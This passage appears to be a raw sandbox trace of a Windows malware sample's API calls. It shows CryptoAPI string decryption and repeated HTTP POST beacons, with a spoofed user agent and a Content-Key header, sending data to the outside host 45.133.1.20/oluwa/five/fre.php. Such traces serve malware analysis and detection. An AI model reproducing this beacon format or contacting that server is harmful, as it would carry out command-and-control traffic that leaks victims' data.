159\r\nConnection: close\r\n\r\n") returned 242 [0255.954] GetProcessHeap () returned 0x6a0000 [0255.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0255.954] GetProcessHeap () returned 0x6a0000 [0255.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0255.954] send (s=0x898, buf=0x6bd460*, len=242, flags=0) returned 242 [0255.955] send (s=0x898, buf=0x6bb998*, len=159, flags=0) returned 159 [0255.955] GetProcessHeap () returned 0x6a0000 [0255.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0255.955] recv (in: s=0x898, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0256.034] GetProcessHeap () returned 0x6a0000 [0256.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0256.035] GetProcessHeap () returned 0x6a0000 [0256.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0256.036] GetProcessHeap () returned 0x6a0000 [0256.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da8c8 | out: hHeap=0x6a0000) returned 1 [0256.038] GetProcessHeap () returned 0x6a0000 [0256.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0256.038] closesocket (s=0x898) returned 0 [0256.039] GetProcessHeap () returned 0x6a0000 [0256.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0256.039] GetProcessHeap () returned 0x6a0000 [0256.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0256.040] GetProcessHeap () returned 0x6a0000 [0256.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0256.040] GetProcessHeap () returned 0x6a0000 [0256.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0256.041] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15c8) returned 0x898 [0256.044] Sleep (dwMilliseconds=0xea60) [0256.045] GetProcessHeap () returned 0x6a0000 [0256.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0256.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.047] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.241] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0256.344] GetProcessHeap () returned 0x6a0000 [0256.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0256.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.345] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0256.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.347] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.348] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.348] GetProcessHeap () returned 0x6a0000 [0256.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0256.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.351] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0256.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.351] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0256.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.353] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0256.353] GetProcessHeap () returned 0x6a0000 [0256.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0256.353] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.353] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0256.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.354] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0256.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.355] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0256.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.356] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0256.356] GetProcessHeap () returned 0x6a0000 [0256.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0256.356] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0256.357] GetProcessHeap () returned 0x6a0000 [0256.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0256.357] GetProcessHeap () returned 0x6a0000 [0256.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0256.358] GetProcessHeap () returned 0x6a0000 [0256.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0256.359] GetProcessHeap () returned 0x6a0000 [0256.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0256.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.362] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.369] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0256.422] GetProcessHeap () returned 0x6a0000 [0256.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0256.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.425] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0256.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.428] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.430] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.430] GetProcessHeap () returned 0x6a0000 [0256.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0256.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.432] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0256.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.435] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0256.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.439] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0256.439] GetProcessHeap () returned 0x6a0000 [0256.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0256.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.441] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0256.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.442] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0256.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.444] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0256.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.446] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0256.446] GetProcessHeap () returned 0x6a0000 [0256.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0256.446] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0256.446] GetProcessHeap () returned 0x6a0000 [0256.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0256.447] socket (af=2, type=1, protocol=6) returned 0x89c [0256.448] connect (s=0x89c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0256.518] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0256.518] GetProcessHeap () returned 0x6a0000 [0256.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0256.518] GetProcessHeap () returned 0x6a0000 [0256.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0256.520] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0256.521] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0256.521] GetProcessHeap () returned 0x6a0000 [0256.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db4c8 [0256.522] GetProcessHeap () returned 0x6a0000 [0256.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0256.523] GetProcessHeap () returned 0x6a0000 [0256.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0256.523] GetProcessHeap () returned 0x6a0000 [0256.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0256.526] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0256.527] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0256.527] GetProcessHeap () returned 0x6a0000 [0256.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0256.527] GetProcessHeap () returned 0x6a0000 [0256.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0256.528] send (s=0x89c, buf=0x6bd460*, len=242, flags=0) returned 242 [0256.528] send (s=0x89c, buf=0x6bb998*, len=159, flags=0) returned 159 [0256.528] GetProcessHeap () returned 0x6a0000 [0256.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0256.528] recv (in: s=0x89c, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0256.619] GetProcessHeap () returned 0x6a0000 [0256.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0256.620] GetProcessHeap () returned 0x6a0000 [0256.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0256.620] GetProcessHeap () returned 0x6a0000 [0256.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db4c8 | out: hHeap=0x6a0000) returned 1 [0256.621] GetProcessHeap () returned 0x6a0000 [0256.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0256.621] closesocket (s=0x89c) returned 0 [0256.622] GetProcessHeap () returned 0x6a0000 [0256.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0256.622] GetProcessHeap () returned 0x6a0000 [0256.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0256.622] GetProcessHeap () returned 0x6a0000 [0256.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0256.623] GetProcessHeap () returned 0x6a0000 [0256.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0256.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15cc) returned 0x89c [0256.628] Sleep (dwMilliseconds=0xea60) [0256.629] GetProcessHeap () returned 0x6a0000 [0256.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0256.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.631] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.648] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0256.659] GetProcessHeap () returned 0x6a0000 [0256.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0256.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.660] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0256.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.699] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.700] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.700] GetProcessHeap () returned 0x6a0000 [0256.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0256.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.702] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0256.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.704] CryptDestroyKey (hKey=0x6ad020) returned 1 [0256.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.705] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0256.705] GetProcessHeap () returned 0x6a0000 [0256.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0256.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.706] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0256.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.707] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0256.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.709] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0256.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.710] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0256.710] GetProcessHeap () returned 0x6a0000 [0256.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0256.710] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0256.711] GetProcessHeap () returned 0x6a0000 [0256.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0256.711] GetProcessHeap () returned 0x6a0000 [0256.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0256.715] GetProcessHeap () returned 0x6a0000 [0256.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0256.715] GetProcessHeap () returned 0x6a0000 [0256.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0256.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.716] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.725] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0256.735] GetProcessHeap () returned 0x6a0000 [0256.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0256.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.736] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0256.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.737] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.739] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.739] GetProcessHeap () returned 0x6a0000 [0256.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0256.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.741] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0256.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.742] CryptDestroyKey (hKey=0x6ad020) returned 1 [0256.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0256.743] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0256.743] GetProcessHeap () returned 0x6a0000 [0256.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0256.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.745] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0256.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.746] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0256.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.747] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0256.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.749] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0256.749] GetProcessHeap () returned 0x6a0000 [0256.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0256.749] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0256.749] GetProcessHeap () returned 0x6a0000 [0256.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0256.750] socket (af=2, type=1, protocol=6) returned 0x8a0 [0256.750] connect (s=0x8a0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0256.779] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0256.779] GetProcessHeap () returned 0x6a0000 [0256.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0256.779] GetProcessHeap () returned 0x6a0000 [0256.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0256.780] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0256.781] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0256.781] GetProcessHeap () returned 0x6a0000 [0256.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6daec8 [0256.782] GetProcessHeap () returned 0x6a0000 [0256.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0256.782] GetProcessHeap () returned 0x6a0000 [0256.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0256.782] GetProcessHeap () returned 0x6a0000 [0256.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0256.783] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0256.784] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0256.784] GetProcessHeap () returned 0x6a0000 [0256.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0256.784] GetProcessHeap () returned 0x6a0000 [0256.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0256.784] send (s=0x8a0, buf=0x6bd460*, len=242, flags=0) returned 242 [0256.785] send (s=0x8a0, buf=0x6bb998*, len=159, flags=0) returned 159 [0256.785] GetProcessHeap () returned 0x6a0000 [0256.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0256.785] recv (in: s=0x8a0, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0256.886] GetProcessHeap () returned 0x6a0000 [0256.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0256.886] 